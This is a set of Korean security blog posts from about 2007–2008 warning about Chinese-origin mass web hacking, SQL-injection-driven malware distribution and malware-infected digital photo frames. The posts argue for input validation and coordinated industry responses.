현재 큰 범주에서 문제를 해결 하기 위한 해결책은 한정적입니다. 지역적인 측면이나 기업 측면에서는 비용을 투입하여 해결이 가능하나 웹서비스의 개편시 마다 비용 부담과 끊임없는 지속성을 유지 해야 하는 것이 관건입니다.  Penetration Test ( 모의해킹이라 부르며 시스템에 피해를 입히지 않는 범위에서 공격자의 입장에서 서비스 취약성을 사전 진단하는 유형 )를 할 수 있는 인력들도 한정이 되어 있습니다. 전문기술을 보유하고 있음에도 불구하고 돌쇠타입의 마당쇠로 전방위로 혹사 당하는 것이 지금의 보안 인력 혹은 보안 팀들이라 할 수 있습니다. 언제까지 버틸 수 있을까요? 또 언제까지 혹사를 강요할 수 있을까요? 인력으로 버틸 수 있는 정도는 절대로 아니기에 어려움이 충분히 예상 됩니다. ( 아닌 곳들이 있나요? )

 

 

결론적으로 앞으로 오랜 시간 문제는 지속되고 심화 될 것이고 이 문제를 줄여나가기 위해서는 악성코드 유포의 숙주로 활용되고 있는 웹서비스들의 안정성을 시급하게 보완하고 지속성을 가질 수 있도록 하는 것이 키라고 할 수 있습니다. 이렇게 하여야만 문제를 끝낼 수 있습니다. ( 기술적인 해결책이나 여러 방안들은 http://blog.naver.com/p4ssion 의 여러 Article들을 참조 하시면 됩니다. )   개별 서비스에 대한 해결책의 논의가 아니라 큰 범주에서의 해결 방안은 어떤 성격을 지녀야만 문제 해결에 다가 설 수 있는지를 언급하였습니다.

 

1년 이상을 이런 관점에서 계속적인 의견을 제시하였으나 아직 이런 형태의 서비스나 문제해결 시도는 출현 하지 않았습니다. 그러나 머지 않은 시일 내에 유사한 서비스들이 출현하여 문제점들을 줄여가고 세계적인 방향성을 선도할 것으로 믿어 의심치 않습니다. 누구도 하지 않는다면  저라도..~~

 

 

그럼 .

 

p4ssionable security explorer . 바다란

Posted by 바다란

이미 한참도 전에 발표한 자료입니다. 앞으로의 예상에 대해서 1년도 이전에 예상을 했으나 앞으로도 이런 문제가 지속

될 수 밖에 없다는 점이 가장 큰 문제가 아닐까 싶습니다. 2006년 연말에 작성한 글이지만 첨부 파일을 보시면 지금도 또 앞으로도 유효한 내용들이 있습니다. 대책은 더욱 그러하죠. 참고하시고 보다 안전한 환경이 되었으면 합니다. 올바른 의견의 확산도..

-----------------------------------------------------------------------------------------------

안녕하세요. 바다란입니다.

 

지난해 부터 급격하게 이슈화된 중국발 해킹에 대해 일정 수준 종합이 필요한 것 같습니다.

현재 게시물에 첨부된 문서는 지난 11.30일에 있었던 민.관 전문가 조사단에서 요청하여 발표한 자료입니다.

 

* 기업에 대한 내용 및 문서 중 정보 노출이 있는 부분은 삭제 하였습니다. 그러므로 결론 부분에 집중하시면 될 것 같습니다.

 

중국발 해킹에 대한 기술적인 내용 보다는 기업차원의 대응 수준 및 향후 필요 요구 사항 그리고 정책적인 대응이 필요한 부분들에 대해서 정리를 한 부분입니다.

 

대개 이슈화 되기에는 악성코드의 유포만이 이슈가 되고 있는데 그 동안 악성코드 유포로 지적이 되었고 언론에 발표 되었던 다수의 사이트들을 많이 알고 계실 것입니다. 그러나 악성코드 유포를 통해 게임이나 온라인 서비스를 이용하는 사용자의 정보만을 가로채어가는 것으로 인식이 되고 있는데 가장 중요한 부분을 간과하고 있는 면이 매우 크다고 볼 수 있습니다.

가장 중요한 점은 악성코드를 유포하기 위해서는 서버 단위에서 소스를 수정할 권한이 있어야 되며 수정할 권한을 지니고 있을 경우에는 모든 연결된 Database의 자료를 빼내어 가는 것이 가능하다는 것이죠.

 

지금까지 해킹을 통해 악성코드 유포로 이용이 된 곳들은 단순한 악성코드 유포를 목적으로 한 곳도 있지만 더 이상 가져갈 자료가 없다고 판단되어 최종적으로 악성코드를 유포하는 유포지로 이용한 의미가 크다고 할 수 있습니다.

 

지난해 10월의 중국발 해킹 대응 세미나를 통해 처음 위험요소를 알렸고 여러 차례의 세미나 및 발표를 통해 충분한 위협을 알렸지만 현재도 향후 발생될 위협에 대한 정확한 인지는 없다고 볼 수 있을 것 같아 조금 정리를 해본 자료 입니다. 중복된 내용 많이 있습니다. ^^;

 

뒷부분의 결론 부분에 들어 있는 내용이 향후 발생될 위험 요소 및 새로운 위협에 대해서 정리를 한 의견이며 앞으로는 기 유출된 수십억건 이상의 개인정보 [ 상세화의 차이는 있는 정보]를 도용한 IT 서비스의 혼란이 주된 요소가 될 수 있을 것 같습니다.

 

전체적인 대응 방안도 꾸준하고 지속적인 계정 관리의 이슈 제기 및 강력한 캠페인 등등 여러 요소가 구비되어야만 가능할 것이며 대응은 느리나 꾸준하게 진행이 되어야 할 것이고 피해는 지속 될 것으로 예상 됩니다.

 

간단한 참고자료 .. 향후 각 서비스별 위험요소에 대한 대비를 통해 일정 수준 대비를 하는 것이 필요할 것 같습니다.

 

의견 있으시면 언제든지 의견 주십시요.

Posted by 바다란

뭐 하루 이틀 된 이야기도 아닙니다.

이미 5~6년 전 부터 징후가 있었고 그 이후 타임워프 하듯이 대규모로 공격 인력이 늘고 기법도 고도화 되어 왔습니다.

 

이젠 대규모적인 대응 없이는 불가능하다고 볼 수 있습니다.

단편적인 대응과 사법기관 공조 만으로는 빙산의 일각도 제거하기 어렵습니다.

 

체계적이고 근원적인 부분에 대해서 장기적인 처방이 필요한데.. 여유와 인내심을 가지고 정책을 진행하고 방향성을 제시 할 수 있을런지가 가장 중요한 부분입니다. 대책 부분에 대해서는 하두 여러번 언급 했었지만 시행에는 상당 시일이 걸리고 시간이 지난 지금에서도 유효한 대응은 적어 보입니다.

 

앞으로 어떻게 될런지..

http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&sid1=105&oid=029&aid=0001974017

 

종합적인 대책과 향후 진행 해야 될 부분들에 대해서는 2007년에 언급한 대책과 문제 상황 부분이 있습니다. 정말 힘들고 위급한 상황이 닥쳐 올 것이라고 예상을 하고 좀 길게 설명을 했었는데 이제라도 일부분에 대해서 적극적인 시행이 되어야만 할 것입니다. 그렇지 않다면 문제는 더욱 더 심각도를 높여서 일어날 것으로 보입니다.

 

보안적인 문제를 해결 하지 않았을때 발생 되는 피해와 비용은 상상하기 어려울 정도이며 지금도 마찬가지 입니다. 초기에 대규모 노력이 들어가는 것으로 보이지만 이것이 가장 적은 비용을 들이고 문제를 해결 하는 길입니다.

 

다시 한번 문제 해결을 위한 방안들이 다각도로 ( 문제의 근원을 제대로 인식하고 ) 진행이 되었으면 합니다.

 

http://blog.naver.com/p4ssion/50024269739  <- 첨부파일을 참고하세요.

 

2007년에 작성한 글이나 노력이 진행 되지 않는한 향후 3~4년 이상 유효한 글이 될 것입니다.

 

Posted by 바다란

바다란입니다. 오랜만에 뵙습니다.

 

* 디지털 액자에 숨겨진 악성코드가 사진 변경이나 추가를 위해 직접 연결되는 PC에 감염을 시키는 유형의 출현

<imgref: http://www.techgadgets.in/images/bestbuy-frame-infected.jpg >

 

 

악성코드 유포의 새로운 유형이 출현 하였습니다.

디지털 액자를 통한 악성코드의 유포 유형인데 해외 언론에서도 특이함에 주목을 하고 있지만 다른 관점에서 보아야 할 이슈들이 있습니다. 한국내의 현실에서는 그다지 새로울 것이 없는 유형이지만 시사하는 점이 여럿 존재하고 있습니다. 악성코드의 유형은 온라인 게임(특히 MMO- 아마 WoW가 아닐까 예상 됩니다.)의 계정정보를 유출하기 위한 형태이지만 근래에 발견되는 악성코드의 특징대로 사용자의 모든 개인정보에 대한 유출이 가능한 형태라 할 수 있습니다. -* 모든 개인정보에 대한 유출이 가능 하다는 의미는 시스템에 대한 완벽제어가 가능하다는 것과 동일함.

 

 

1. On/Offline 연계를 통한 악성코드의 유포

 

2. 공격 기술의 진보 가속화 (Quality Assurance ??) - Vaccine evasion

 

3. Application Attack의 일반화 및 영향력 확대 - 세계화

 

 

주요 시사점은 위의 세 가지 정도로 볼 수 있습니다.

일반적으로 판매되고 있는 디지털 액자를 통해 Worm 유형의 악성코드 유포를 한 사안인데 심각한 사안은 제조공정에서나 탑재가 가능한 Application에 악성코드가 심어져 있는 것이 발견이 된 것입니다.

 

문제가 된 버젼은 insignia 사에서 제조한 10.4inch의 디지털 액자이며 2007년에만 디지털 액자가 미국 내에서 천만개 가량 팔린 것으로 조사가 되고 있습니다. 이중에 몇 개나 문제가 되고 있는지는 파악하기는 어렵지 않을까 싶습니다.

 

미국 내 대형 유통 업체인 Bestbuy( Sam's club, Costco 등에서도 판매가 되었다고 함)를 통해 Offline 판매가 되었으며 올해의 신년 Holiday 기간 중에 판매된 제품들 중에서 문제가 최초 발견이 된 것으로 보고가 되고 있습니다. 공식적으로 Bestbuy에서는 해당 제품의 판매수치에 대해 언급 하지는 않고 있습니다. 또한 이와 같은 이슈에 대해 제품에 대한 Recall도 없는 상태이구요.

( 그렇다면 Worm을 어떻게 제거 할까요? 디지털 액자에도 AntiVirus를 설치해야 하는 것인지 아니면 PC 연결 이후 해당 디지털 액자에 대해 Storage 검사를 해야 하는 것인지 궁금하네요. 아마도 후자일 것 같습니다.)

 

http://fatmatrix.com/digital-frames-infected-with-virus.html

기사를 확인하여 보면 Insignia와 Bestbuy측은 최초 웜의 발견 이후에 발표된 논평에서 일반적인 바이러스 이며 대부분의 Anti Virus 소프트웨어를 통해 탐지 및 제거가 가능한 유형이라고 해명을 하였으나 이후 전문 AntiVirus 업체인 CA의 분석결과는 또 다른 유형으로 나오고 있습니다.

 

http://www.eurogamer.net/article.php?article_id=92900

온라인 게임 관련 매거진의 내용대로라면 Antivirus 제품에 의한 탐지를 피하고 Windows Firewall ( 이 의미는 외부 연결 제한을 우회 할 수 있다는 의미로서 조금 더 확장하여 보면 독자적인 정보 전달 통로를 제한 없이 이용 할 수 있음을 의미합니다.)의 제한 회피등이 가능하다고 되어 있습니다.

 

좀 더 자세하게 나타난 자료를 찾아 보니 다음과 같습니다. 공신력이 있는 UPI를 통한 언론 보도이니 신뢰가 가능할 것 같습니다.

http://www.upi.com/NewsTrack/Science/2008/02/18/digital_frame_virus_traced_to_china/9409/

위의 기사에서는 좀 더 상세한 내용들이 나오고 있습니다.

 

최소 100여 개 이상의 Antivirus 제품으로 부터 탐지를 회피하고 있으며 Windows system의 보안기능을 우회하는 기능을 가지고 있습니다. 더불어 추적이 힘들도록 구성이 되어 있다고 CA의 제품개발 담당이 이야기를 하고 있습니다. Nuclear  bomb 이라고 언급을 하기도 합니다. 이 의미에는 악성코드의 유포방식, 보안제품에 대한 탐지 우회, 시스템의 제한 우회, 추적 회피 등과 같은 다양한 이슈가 포함 되어 있다고 보입니다.

 

 

언론이나 온라인의 기사만으로 사실 추론은 위와 같이 가능합니다. 그렇다면 이슈가 되는 부분들은 무엇이 있을까요?

 

가장 먼저는 insignia 사의 제품 제조 공정까지 침입한 공격자를 들 수가 있습니다. 제품제조 공정시에 탑재되는 Application을 변조 시킬 정도라면 해당 회사의 전체 시스템도 매우 위험한 상태에 놓여 있으며 이미 공격자가 시스템 대다수의 권한을 가지고 있다고 볼 수 있습니다. 공격이 가능한 지점은 내부 담당자에게 악성코드가 담긴 이메일 전송을 통해 ( 최근엔 Office 계열 파일이 다수 사용됨) 권한 획득을 하였을 경우와 외부로부터 직접 웹 서비스의  Application 취약성을 공격하여 차근차근 권한 획득을 한 두 가지 경우로 볼 수 있습니다.

 

중요한 관점은 사용자들에게 배포되기 직전 단계의 Application 변조가 일어났다는 것이며 그 어떤 AV 제품으로도 탐지가 되지 않는 신형 악성코드가 추가 되었다는 점입니다. 더불어 주변기기를 통한 전파를 노린 점도 향후의 위험성을 증대 시킵니다. 그 어디에도 이런 의미를 논하고 있지는 않습니다.  실제 우리가 사용하고 있는 모든 디지털 관련 제품들이 향후 더욱 큰 위협들에 노출 될 수 밖에 없음을 실증적으로 보여주는 사례라 할 수 있으며 악성코드 전파 방법의 특이성 또한 염두에 둘만 합니다.

 

두 번째로는 악성코드의 진화입니다. 최소 100여 개 이상의 Antivirus 제품으로부터 탐지를 회피한다는 의미는 공격자들이 공유하고 있는 기술 수준이 높음을 의미합니다. 또한 곧 일반화 될 것으로 예상됩니다. 한 해에 몇 천개 혹은 몇 만개 정도씩 만들어 지는 중국발 악성코드의 기능들이 대폭 업그레이드 될 가능성을 내포하고 있다고 볼 수 있습니다. 운영체제의 보호기능 정도는 당연히 더 쉬운 상태라 할 수 있습니다.

 

세 번째로는 Online 상의 방문자가 많은 사이트를 통한 악성코드 유포 이외에도 Offline상의 Digital 주변기기를 통한 전파 방식입니다. 기존에는 방문자가 많은 사이트를 공격하여 소스코드를 변조함으로써 악성코드를 유포하는 방식을 일관되게 사용하였으나 이제는 주변기기 제조회사 등을 공격하여 Offline상에서도 배포가 되는 방향도 시도가 되었다는 점은 여러 가지를 생각하게끔 합니다.

 

 

앞으로의 예상은 중국발 해킹의 세계화와 온라인게임의 risk 지속 확대, 온라인 생활(금융, SNS 등)의 위험 증가가 일반적인 상황이라고 할 수 있습니다.

 

중국발 해킹은 2005년부터 위험요소를 언급 하고 세계적으로 확대 될 것이라고 개인적으로 여러 자리에서 공언 하였습니다. 현재의 상황은 그 공언을 실증적으로 보여주고 있습니다. 앞으로도 상당기간 지속될 것이고 전 세계적인 Risk가 될 것으로 보입니다.  온라인 게임 혹은 금융과 같은 다양한 온라인의 생활은 금전적인 가치와 결부되는 순간에 공격의 대상이 됩니다. 시대의 변화는 온라인에 가치를 부여하는 것이 당연한 것이므로 앞으로의 위험은 모든 부분에 걸쳐 나타날 것으로 예상 됩니다.

 

 

중국발 해킹의 근본적인 부분은 현재 상태에서 두 가지에 기인합니다.  Office 파일을 이용한 신규 백도어 설치 방법 ( 주로 이메일을 활용) , Web Application Attack을 통한  권한획득과 웹 Application 소스코드의 변조를 통한 악성코드 유포입니다.

근본적으로 백도어를 활용한 방식 (주로 폐쇄적인 망을 공격합니다. 주요 국가들의 국가기관들의 공격, 산업기밀의 유출등..) 과 Web Application Attack이 일반적입니다. 아니 이 두 가지가 전부라 할 수 있습니다.

 

백도어를 활용한 방식 부분은 운영체제적인 면과 Antivirus 측면에서 충분한 대응 방안들이 나올 수 있습니다. 그러나 사람이 제작하는 Web Application에 대한 공격은 향후에도 많은 어려움이 있을 수 밖에 없습니다. 아직 중국발 해킹은 2라운드 초반입니다. 이제 겨우 세계로 진출한 것이라 할 수 있습니다.  Web Application의 공격 방식을 유추하여 모든 사이트에서 공격에 사용될 근본 원인을 제거 하지 않는 한 문제는 계속 됩니다.

 

URL에 사용되는 모든 인자들에 대한 Validation check가 문제 해결의 시작이 될 것입니다.

 

국내의 상황을 한번쯤 생각해 보시죠 어떤 위험들이 앞으로 다가 올 것인지... ( IPTV, 유.무선연동 등등 무궁무진 하겠네요..)

 

감사합니다.

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

지난 10.24일에 KISA에서 주최한 침해사고 대응 세미나가 있었습니다.

해당 세미나에서 침해사고의 발전 유형과 대응 방안에 대해서 고민하고자 했는데 제대로 전달이 되었는지 모르겠네요.

 

가장 중요한 팩트는 이미 취약점 및 공격 유형은 커버가 가능한 범위를 넘어 섰다는 점입니다.

기본적으로 지금까지 알고 있던 유형의 대비책만으로는 한계가 있으며 정량적인 대책으로는 해결 되지 않고.. 정성적인 대책이 있어야만..또 꾸준히 진행 되어야만 문제가 일정 수준 이하로 감소 됨을 확인 할 수 있습니다.

 

현재의 공격유형은 매우 치밀하고도 집요합니다.

기존의 모든 보안솔루션을 무력화 시키고도 가볍게 전파가 됩니다.

그만큼 공격 기술의 전파가 빠르게 또 깊이 있게 공유가 된 탓이라 볼 수 있습니다.

 

보안 기술의 전파는 이에 비하면 거북이 걸음이지요.

 

작은 기술이나.. 작은 시각이나마 여러 방면에서 조망을 하여 보다 더 체계적이고 완전한 구성을 만들었으면 합니다.

 

꾸준한 투자가 들어가야만 산업을 유지 할 수 있는데.. 이제는 이 것이 필수 인데.. 이 것을 인정하지 않는 기업이나 산업은 점차 쇄락할 수 밖에 없을 것 입니다.

이제부터는 보안이라는 측면은 최소한 IT 비지니스를 하는 회사에서는 가장 필수적인 중심요소입니다.

 

자료 참고 하세요.

 

 

Posted by 바다란

 

왜 상상하기 어려운 위협인가? - Digital pest!

  - 바다란

   * 1편은   http://p4ssion.com/110여기를 참고 하세요.

 

왜 상상하기 어려운 위협인가? 상상하기 어려운 위협이라는 의미는 개별적인 서비스에 대한 공격에서 이제는 전역적인 대규모 서비스 공격으로 확산되고 있기 때문에 그러합니다. 더군다나 문제점들이 단기간에 개선될 가능성은 전혀 없으므로 앞으로도 전역적인 공격이 계속 될 것입니다. 상상하기 어려운 위협. 위협의 실현. 그리고 확산

 

그 동안 Web Application에 대한 공격은 지속적으로 되어 왔습니다. 그러나 최근에 발견된 공격 유형은 산발적인 공격이 아닌 대규모적인 공격을 의미합니다. 대규모적인 공격에 사용된 도구도 유추가 가능합니다.

아래 이미지 참고 하세요.

 

<ref : Attack structure 0804- made by p4ssion>

 

위의 이미지는 지난 몇 년 동안 공격 유형을 추적하면서 갱신한 공격의 흐름도 입니다. 여기에 새로 추가가 된 부분이 0번에 해당하는 내용입니다. 이제는 개별적인 Famous web service를 공격하는 것이 아니라 무작위적인 Target search 이후 공격이 이루어집니다. 공격 시에는 Google이나 기타 검색엔진을 통해 기본자료 추출 (특정 코드로 개발 ASP , 특정 DB 사용 MSSQL)을 통해 공격하는 기초적인 루틴이라 볼 수 있습니다. 무작위적인 Target search에는 전세계 모든 도메인에 대한 자료를 기반으로 공격을 하는 것도 예상 할 수 있습니다. 피해의 규모가 그 동안에는 특정 서비스에 방문하는 유저로 한정 되었다면 이제는 전 세계적인 확산 범위를 갖추고 있다고 보아야 됩니다.

 

공격대상: 전 세계의 Web service를 공격하여 악성코드를 확산

공격목표: 전 세계의 개인 Client PC에 대한 권한 획득 및 중요정보 탈취

 

위와 같은 전제에 가장 충실한 필요충분 조건이 완료 되었다고 볼 수 있습니다. 그 결과가 이번에 나타난 것이며 실제적으로는 조금 더 오래 되었다고 판단 합니다. 악성코드의 발전 방향에 있어서 보안이라는 부분은 전역적으로 이루어 지지 못하고 있습니다. 특정 국가에만 한정하여서도 전역적으로 이루어 지기 어려운 것이 현실이지만 이미 공격자는 전 세계의 영역을 범위에 두고 있습니다.

 

새로운 공격코드의 출현과 새로운 zeroday exploit의 출현은 피해를 기하급수적으로 늘릴 것입니다. 지금까지와 같은 몇 만대, 몇 십 만대의 규모가 아닌 몇 천만대를 기본으로 가지게 될 것입니다.

 

전 세계의 IT 산업 자체가 위험에 빠지게 된 것이라 할 수 있습니다. 특히 글로벌 서비스를 진행하는 금융 및 IT 서비스 업체에게는 직접적인 공격 대상이 될 수 있으며 위험성이 부가가 될 것입니다. 이 의미는 금전적인 관련이나 직접 거래가 발생 할 수 있는 모든 전자 상거래 부분에 있어서 중대한 위협의 출현과 동일합니다.

 

공격자의 예상대로의 시나리오를 대략적으로 유추하면 다음과 같습니다.

 

공격시나리오:

 

1.       신규 Zeroday exploit을 발견 혹은 구매 ( MS 운영체제가 가장 효율적이므로 MS 계열에 집중할 것이 당연함)

2.       Malware에 키보드 후킹 및 중요 사이트에 대한 접근 시 정보 탈취 코드 탑재

A.       S.korea 에서 발견된 DDos 가능한 Agent의 탑재 가능

B.       A항과 동일한 기능이지만 대규모 Botnet의 구성 가능

3.       Malware를 유포할 숙주 도메인에 코드 추가

A.       Malware를 유포하는 링크 도메인으로서 08.4월에 발견된 경우 처럼 1.htm ,1.js등의 코드로 특정 사이트 해킹 이후 해당 파일의 추가를 할 것임

B.       국가에 따라 수십에서 수백여 개의 링크 도메인을 확보 할 것임

4.       대규모 도메인 스캔도구를 활용 주요 도메인에 대한 악성코드 유포루틴 Add

A.       검색엔진 활용 또는 자체 보유한 도메인 리스트를 활용하여 순차적으로 공격을 시행

B.       공격 시 취약성이 발견되면  자동적으로 DB권한 획득 및 획득한 DB의 권한을 이용하여 웹 소스코드의 변조 시행

C.       현재 발견된 코드는 DB 테이블의 내용에 악성코드를 추가하는 루틴 이였으나 조금 더 코드가 갱신되면 충분히 웹페이지 소스코드에 교묘하게 위장하는 것이 가능함

5.       대규모로 유포된 악성코드를 활용한 금전적인 이득 취득

A.       특정 사이트에 대한 대규모 DDos 공격 현재 상태의 malware 유포 규모라면 대응 불가

B.       특정 온라인 게임 ( 세계적인 게임- Wow? ) 및 금융 관련 사이트에 대한 키보드 입력 후킹 ( 사용자의 정보 유출 )

                                     i.              온라인 게임 및 온라인 증권사에 대한 위험성이 높음 . 부수적인 인증 수단을 가지고 있는 경우 ( ex : otp , secure card )를 제외하고는 모든 대상에 대한 위험성 존재

 

* 4번 항목에서 발견된 악성코드 유포를 위한 웹사이트 변조가 08.4월에 발견된 카운트만 전 세계적으로 50만개의 개별 웹서비스(일부 중복 결과라 하여도 예상 결과는 변하지 않음)에 해당됩니다. 악성코드 유포 규모는 최소 천만 단위를 상회할 것으로 추정되며 Zeroday exploit에 따라 그 규모는 몇 십배로 늘거나 백만 단위 규모로 확대 될 것으로 예상됩니다.

 

위와 같이 시나리오가 예상됩니다. DB에 들어 있는 개인정보는 이미 우리 것이 아니죠. 한국뿐 아니라 전 세계 모든 내용이 마찬가지 입니다.

 

왜 상상하지 못할 위협인지 아무도 인지를 못하고 있습니다. 세계 어느 누구도 또 어떤 회사도 심각성에 대해서 그다지 인지를 못하고 있는 것으로 보입니다. 두렵습니다. 이젠 해결책도 제안 할 수 있는 범위를 넘어서 버렸습니다. 한국 내에서 발생하는 이슈들에 대해서도 몇 년 전부터 해결책을 직접 제안하고 다각도로 방안을 제시 했었는데 그 범주와 동일한 해결 방안들이 전 세계적으로 제안이 되어야만 가능한 상황이 되어 버렸습니다.

 

얼치기 Security product들만 또 근본 문제 해결 없는 땜빵 들만 전 세계적으로 출몰하게 생겼습니다. 안타까운 일입니다.

 

 

제품으로 해결될 부분은 없습니다. 단지 현 상태를 잠시 피할 수만 있을 뿐입니다. 근본적인 문제를 수정하지 않는 한 문제는 계속 될 수 밖에 없습니다. 근본 문제를 수정 한다는 것은 전 세계적인 Web Application 취약성 부분에 대해 수정이 되는 것을 의미합니다. 과연 가능할까요?

 

2005년에도 국가 전체적인 대응 방안을 제시한 적이 있습니다. 그 내용은 지금도 여전히 유효하며 지금부터 전 세계적인 영향력을 가집니다.

지금의 상황은 전체 Web Application의 위기이며 또한 IT산업 (장치산업 제외)의 위기입니다. 전 세계 거의 모든 Web application 개발 관련 서적에서 URL 인자에 대한 필터링을 강조하는 서적은 없습니다. 최근에 나온 Security 관련 개발서적 외에는 찾을 수가 없습니다. 이 문제는 앞으로도 계속됨을 의미합니다. 문제는 MS 관련 제품뿐 아니라 모든 Web 개발언어에도 동일하게 적용됩니다. 기대효과 측면에서 MS 제품에 대한 코드가 먼저 실현 된 것 뿐입니다.

 

문제의 근본원인은 SQL Injection XSS 취약성과 같은 Web application 소스의 필터링 부족 문제입니다. SQL Injection DB로 전달되는 인자에 대한 필터링 부족이 문제이며 XSS는 사용자 입력에 대한 특수문자 혹은 실행가능 스크립트에 대한 필터링 부족이 문제입니다. 모든 문제가 필터링에서 비롯되고 있습니다. 이후의 공격에 대한 차단은 별개 문제입니다. 중환자의 근본 원인을 제거하지 않고 부수적으로 나타나는 현상에만 집착을 하고 있습니다. 속에서는 암이 퍼지고 있는데 열이 난다고 밴드를 머리에 붙인 형국입니다. 이제 그 암은 전체에 영향을 미치는 범주로 확대 되었습니다. 밴드를 붙이고 해열제를 놓는다고 해결될 문제가 아닙니다. 근본 체질을 변경하고 지속적이고 꾸준한 노력만이 개선을 할 수 있습니다.  Pest는 이미 확산된 상황입니다. ( 여기서의 pest는 해충이 아닌 흑사병입니다. 치명적이므로..)

 

 

해결방안은 간단하면서도 어렵습니다.

 

1. Web application에 대한 취약성의 제거 제거를 위해서는 정확한 진단이 필요합니다. 현재 상용화된 Web app scanner로는 감당이 어렵습니다. Web security product에 대한 내용은 차후에 별도로 설명 합니다.  또한 제품의 가격도 만만치 않으며 지속적인 문제의 발견과 갱신이 어렵습니다. 한마디로 현재 상태로는 국소적인 혹은 여력 있는 기업들에서나 일부 주기적인 대응이 가능하나 문제는 계속 될 것으로 보입니다.

 

 - Web security 관련 scanner 제품이 효율성을 지니려면 다음과 같은 질문에 해답을 지니고 있어야 됩니다.

URL 수백 개 이상 혹은 그 이상의 도메인 리스트에 대해 짧은 시일 내에 효율적인 진단이 가능한 스캐너가 존재합니까?

대규모 연결구조를 가지는 도메인에 대한 효율적인 진단이 가능합니까?

웹 서비스의 개발속도는 빠르며  유지보수 횟수는 매우 많습니다. 매번 마다 효율적인 진단이 가능합니까?

웹서비스의 개발 비용 및 유지보수 비용 보다 낮은 비용으로 진단이 가능합니까?

수정 해야 될 코드 부분과 문제 발생 부분을 정확하게 직시 합니까?

 

여기에서 효율적인 진단이라는 의미는 최소한 공격도구보다 빠른 시간 내에  문제점을 찾아내는 것을 의미합니다. 도메인 하나당 최대한 1일을 경과 하여서는 효율성은 없다고 봐야 할 것입니다.

 

2. Malware 유포에 대응하기 위한 신속한 협의체 구성 주로 전 세계 백신 업체들

각 회사간의 이해관계로 어려움이 있을 것입니다. 그러나 전 세계를 대상으로 일관성을 가지고 유포되는 악성코드에 대한 대응에는 글로벌 보안 협의체가 필요하며 빠른 정보교환으로 사후 발생 문제를 최소화 하여야 합니다.

 

백신업체들 간에 대응책을 구비하려면 다음과 같은 질문이 필요합니다.

문제의 발생은 전역적으로 발생하고 있습니다만 해결책은 최초 발견 백신 범주에서만 제공 되고 있지 않습니까?

새로운 zeroday 유형의 백도어를 얼마나 발견하고 있습니까? ( system , web )

Heuristic method의 효율성은 얼마나 될까요? (오탐비율은 얼마나 줄었습니까? )

타 백신 개발사들과의 샘플 교환 및 정보 교류는 얼마나 활발 합니까?

 

3. 서비스 단위의 정보 유출의 방지를 위한 노력 키보드 후킹등에 의해 사이트 로그인 정보들이 노출 되지 않도록 End to End 단위의 암호화 전송 수준을 전체적으로 높여야만 합니다.  이 부분은 개별 기업들에서 진행을 하여야 하며 상당 수준의 노력이 필요하여 향후 어려움이 계속 될 부분입니다. 더불어 서구권역에서는 매우 힘들 것으로 보입니다.

 

키보드 입력부터 BHO (IE Plugin) -> 전송단계까지의 크게 3단계에 이르는 보안성을 완전하게 한 서비스 기업은 전 세계에 얼마나 될까요?

 

각 단위에 대한 해결책의 상세한 내용이나 전개는 이미 여러 해 전에 기술해 둔 바 있습니다. http://p4ssion.com 에 올려둔 최근 발표자료를 참고 하시면 됩니다.

(IT 서비스의 현재 위험과 대응에 대하여- http://p4ssion.com/199  첨부파일 참고)

 

 

세계적이며 전역적이고 포괄적인 대응책이 이루어 져야만 문제를 점차 줄여가고 해결 할 수 있습니다. ( 지구방위대라 불리는 상상의 기관이라도 동원 해야 가능할까요? )

 

저만 느끼는 공포였으면 했는데 이제는 눈 앞에 정체가 드러났네요. 어떤 식으로 풀어 갈 수 있을지 혼돈의 세상입니다.

 

Posted by 바다란

예고드린 대로 상상하기 어려운 위협에 대한 내용입니다. 두편 입니다. 호러물 정도 될 것 같습니다.

 

 

 

일전에 중국발 해킹이 전 세계로 확산 될 것을 예상 하였고 관련 내용들을 여러 번 공유를 한 적이 있습니다. 이제 실제적인 위협으로 직접 출현을 하고 있습니다. 국내는 2005년부터 일반적으로 발생 하였고 세계적으로 확대된 시기는 2006년 하반기쯤으로 예상을 하고 있습니다. 2007년에도 세계적으로 많은 이슈들이 생산 되었습니다. 올해 들어서는 더욱 드라마틱한 증가를 보이고 있는데 특이한 사항들이 눈에 드러나고 있습니다.

 

http://securitylabs.websense.com/content/Alerts/3070.aspx

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080580

 

위의 Websense 사의 조사 결과 이외에도 ( 위의 조사 결과는 google을 통한 동일 도메인 스크립트와 게시물의 링크만을 조회한 내용이며 실제적으로는 더욱 많은 피해가 있음은 당연한 이야기 입니다. 중복된 결과가 반영 된다 하여도 상상하기 힘든 수치입니다. ) 국내에서도 동일한 유형으로 조사를 한 결과 약 5만개 이상의 침입을 당한 사이트가 존재 하는 것이 확인 되었습니다.

http://www.boannews.com/media/view.asp?idx=9671&kind=0

 

위의 사안들에서 일반 사용자들은 물론이고 전문가들 조차도 오해와 잘못된 인식이 있는 부분들이 존재하고 있습니다. 이런 부분들에 대해서 정리하는 것도 필요하고 근본적인 원인 제거를 위해서는 어떤 것들이 필요한 지에 대해서 정리가 필요합니다.

 

 

 

상상하기 어려운 위협

 

 

실제화된 위협입니다.

상상하기 어려울 정도의 혼란이 다가 올 수도 있습니다. 이미 시작은 된 상태입니다.

위에 기사화된 내용이 전체를 나타내고 있지 않습니다. 확대 시키지도 않고 위에 나타난 내용대로만 기술을 해봅니다. 

 

50만대의 PC라 해도 규모가 엄청나다고 할 수 있는데 이건 PC가 아닙니다. 50만대의 웹서비스 입니다. 그렇다면 방문자를 곱하면 얼마나 될까요? 하루에 열명이 방문하는 정말 초라한 웹서비스라 할지라도 50 * 10 = 500만 입니다. 이미 인터넷상에 오픈 된지가 오래 되었으므로(10일 정도 노출을 추산) 여기에 또 * 10을 합니다. 5000만대의 개인 PC입니다.  정말 최소치로 잡은 내용입니다.  5000만대 중 정말 여유롭게 잡아서 스크립트에 포함된 공격코드가 실행이 안 되는 패치 설치자 및 다른 종류의 운영체제를 쓰는 사용자 비율을 40%로 보겠습니다. IE가 아닌 다른 브라우저의 사용자라 하여도 Windows 계열의 사용자들은 영향을 받습니다.

 

##########0*

<ref: http://en.wikipedia.org/wiki/Usage_share_of_web_browsers >

 

현재 Windows pc를 사용하는 일반 사용자의 비율은 90% 가량에 이릅니다.

<ref: http://en.wikipedia.org/wiki/Usage_share_of_desktop_operating_systems >

한국의 예가 아니라 전 세계적인 통계치의 예입니다.

 

